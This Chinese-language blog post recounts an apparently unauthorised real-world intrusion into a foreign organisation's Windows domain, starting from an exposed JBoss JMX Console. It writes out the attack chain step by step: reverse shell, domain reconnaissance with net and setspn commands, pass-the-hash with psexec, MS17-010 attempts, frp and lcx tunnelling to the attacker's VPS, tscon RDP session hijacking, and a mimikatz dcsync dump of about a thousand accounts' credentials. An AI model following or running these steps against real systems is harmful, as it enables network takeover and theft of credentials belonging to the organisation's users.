前言

最近闲来无事,朋友说有个站叫我去看看。由于是实战,厚马见谅。

web打点

上来就是一个jboss界面

随手一点,JMX Console竟然可以直接进。

这里最经典的玩法就是war包的远程部署

找到jboss.deployment

进入后找到void addURL()

这里网上有很多文章写这个玩法,这里就不复现了。

而前辈们早已写出了集成化工具,放到脚本工具上跑一下看看

脚本显示有两个漏洞,其中一个就是JMX Console,直接让脚本跑一下试试。

直接反弹了一个shell

由于这个shell比较脆弱,这里大致查查进程(无AV),看看管理员登录时间和网卡信息等等。

可以看到是有域的

大致了解了情况后就想直接走后渗透,ping下度娘看下机器出不出网。

是出网的,由于是国外的机器ping就比较高,由于无杀软,所以准备直接powershell上线

因为后来发现域很大,派生了一个会话来操作。

后渗透

本机信息收集

权限很高,上来先把hash抓到,心安一点。

一开始没注意仔细看,这里已经发现当前主机所在的域名

由于是在域中,通过dns大致定位域控ip

不急着打域控,先做一波信息收集

域内信息收集

查询域数量

查询域内计算机列表

查询域管账户net group "domain admins" /domain

查询域控账户shell net group "domain controllers" /domain

这里04和53的后缀和刚刚DNS的后缀是一样的,确认域控机器和账户

查询域内用户shell net user /domain

这一个域大概是三四百个用户账号,还是比较大的

查询域所用主机名shell net group "domain computers" /domain

主机也有一百多台

shell net accounts /domain查看域账户属性,没有要求强制更改密码

shell nltest /domain_trusts域信任信息

shell net group /domain查看域中组信息

net use查看是否有ipc连接,net share查看共享

但是这里net session有几台,这是其他主机连接本机的ipc连接

spn扫描

机器在域内了,spn是不得不看一下的,比起端口扫描更精确,也更加隐蔽,这是由于SPN扫描通过域控制器的LDAP进行服务查询,而这正是Kerberos票据行为的一部分。
windows自带了一款工具:setspn
shell setspn -T xxxx -Q */*

这里就可以看到28机器有MSSQL服务,开启1433端口

这里服务确实有点太多了,为了方便就将结果输出到文本

将主机名列出
grep "CN=" spn.txt | awk -F "," {'print $1'} | awk -F "=" {'print $2'} > host.txt

横向移动

上来先试试pth域控,无果,又尝试扫描MS17010,也没有洞,只能去先横向其他的主机。通过上面net session,发现一个与当前主机用户名相同的账户名称,尝试psexec传递hash
拿下该主机

这个session有一个作用就是盗取令牌,创建更高权限账户的进程,比如域管的cmd这种,但是这里我对比了net session的用户名和域管用户的用户名,发现没有一个是相同的,这个方法也就不去尝试了。

批量扫一波MS17010,这个域的防御性比较高,只有零星几台有漏洞。

并且同网段没有,只有0,2,3段各一台,这里就像先把他们都先拿下,看OS版本应该是没问题的,准备派生会话给msf去打。

MS17010

cs上还是不太好打,派生个会话给msf。我的vps是windows server的,一开始下了个windows版的msf在vps上,但是添加路由的时候一直说我参数不对,就不知道咋回事。

还是算了,就搞个代理到本机用虚拟机kali吧。我用的是frp,vps当server,虚拟机当client

vps配置frps.ini
配一个端口

kali配置frpc.ini

然后vps上命令行启动frps.exe
frps.exe -c frps.ini

kali执行
frpc.exe -c frpc.ini

这样就可以愉快的派生会话了,但是这里最后打的时候三台主机没一台能打下来。首先三台主机都没有开启管道,只能用eterblue模块,最后也没成功,这个域系统安全性还是比较高的。

pth

没办法,系统漏洞一台拿不了,但是通过端口扫描发现大量主机开启445端口,于是还是先pass the hash

批量撞一波

断断续续拿下不少主机

这时就一台一台的信息收集

rdp劫持会话

在27这台主机上发现,有两个会话,上面是我们已知账号和明文密码的普通域内账户,而下面这个用户经过比对,为域中域管用户。

由于我们自身权限也高,这里就想rdp上去劫持该会话(当时打的时候比较激动,没注意看这个会话是失效的,这里还是记录一下)
看眼时间,应该在休息呢

lcx设置代理
目标机器上
shell C:\Windows\system32\lcx.exe -slave 公网ip 7212 127.0.0.1 3389
vps上
lcx -listen 7212 5555

在cs上执行shell tscon 2
他说没有权限。

在目标机器执行的时候提示错误的密码,猜想大概是会话断联的原因。如果STATE是active应该是没问题的。

拿下DC

将所有拿下的主机的hash全部dump出来,整合后发现有Administrator的账户hash,且是域中账户,而在域中Administrator是作为域管账户的。
445端口开启

尝试pth

失败了,如果不能pth这个hash将索然无味,又不能拿到明文
这里搞了很久,然后又回去信息收集。
搞来搞去搞了很久,还是那么7、8台主机,最后也是没办法,由于抓到了很多密码,把所有Administrator用户的hash全部pass了一遍,终于拿下了域控

导出ntds,抓下密码,这里使用mimikatz
lsadump::dcsync /domain:xxx /all /csv command

将近一千个用户,RDP他们好像随时都是连着的。

想3389上去看一下,找一个没有连接的用户

找到该用户的hash拿去解密

成功连接

ENDING...